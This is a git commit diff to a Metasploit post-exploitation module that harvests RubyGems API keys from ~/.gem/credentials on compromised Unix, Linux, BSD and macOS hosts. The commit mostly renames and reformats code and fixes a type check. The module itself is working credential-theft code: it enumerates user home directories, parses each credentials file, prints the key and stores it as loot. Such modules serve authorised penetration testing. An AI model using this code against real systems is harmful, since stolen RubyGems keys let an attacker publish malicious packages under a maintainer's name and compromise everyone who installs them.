Fix bugs and make final changes

2015-01-26 23:29:10 -06:00 · 2015-01-26 23:29:10 -06:00 · d53f4e1178
parent 2bb9314b4b
commit d53f4e1178
1 changed files with 29 additions and 25 deletions
--- a/modules/post/multi/gather/rubygems_api_key.rb
+++ b/modules/post/multi/gather/rubygems_api_key.rb
@ -6,57 +6,61 @@
 require 'msf/core'
 require 'yaml'

-class Metasploit3 < Msf::Post
+class Metasploit4 < Msf::Post

  include Msf::Post::File
  include Msf::Post::Unix

  def initialize(info = {})
    super(update_info(info,
-      'Name'          => 'Multi Gather RubyGems API Key ~/.gem/credentials',
-      'Description'   => %q{
+      'Name'         => 'Multi Gather RubyGems API Key',
+      'Description'  => %q{
        This module obtains a user's RubyGems API key from ~/.gem/credentials.
      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'Jonathan Claudius <jclaudius[at]trustwave.com>',
-                           'Brandon Myers <bmyers[at]trustwave.com>' ],
-      'Platform'      => %w{ bsd linux osx unix },
-      'SessionTypes'  => %w{ shell }
+      'Author'       => [
+        'Jonathan Claudius <jclaudius[at]trustwave.com>',
+        'Brandon Myers <bmyers[at]trustwave.com>'
+      ],
+      'Platform'     => %w{bsd linux osx unix},
+      'SessionTypes' => %w{shell},
+      'License'      => MSF_LICENSE
    ))
  end

  def run
-    print_status("Finding ~/.gem/credentials")
-    paths = enum_user_directories.map {|d| d + "/.gem/credentials"}
+    print_status('Finding ~/.gem/credentials')
+    paths = enum_user_directories.map { |d| d + '/.gem/credentials' }
    paths = paths.select { |f| file?(f) }

    if paths.empty?
-      print_error("No users found with a ~/.gem/credentials file")
+      print_error('No users found with a ~/.gem/credentials file')
      return
    end

-    download_loot(paths)
+    download_key(paths)
  end

-  def download_loot(paths)
+  def download_key(paths)
    print_status("Looting #{paths.count} files")
    paths.each do |path|
      path.chomp!
-      next if [".", ".."].include?(path)
+      next if ['.', '..'].include?(path)

-      rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key] [...]
-      next unless rubygems_api_key.is_a(::String)
-      
-      print_good("Found a RubyGems API key #{rubygems_api_key}")
+      rubygems_api_key = YAML.load(read_file(path))[:rubygems_api_key]
+      next unless rubygems_api_key

-      loot_path = store_loot("host.rubygems.apikey",
-                             "text/plain",
-                             session,
-                             rubygems_api_key,
-                             "ruby_api_key.txt",
-                             "Ruby API Key")
+      print_good("Found a RubyGems API key: #{rubygems_api_key}")

-      print_good("RubyGems API key stored in #{loot_path.to_s}")
+      loot_path = store_loot(
+        'rubygems.apikey',
+        'text/plain',
+        session,
+        rubygems_api_key,
+        'rubygems_api_key.txt',
+        'RubyGems API key'
+      )
+
+      print_good("RubyGems API key stored in #{loot_path}")
    end
  end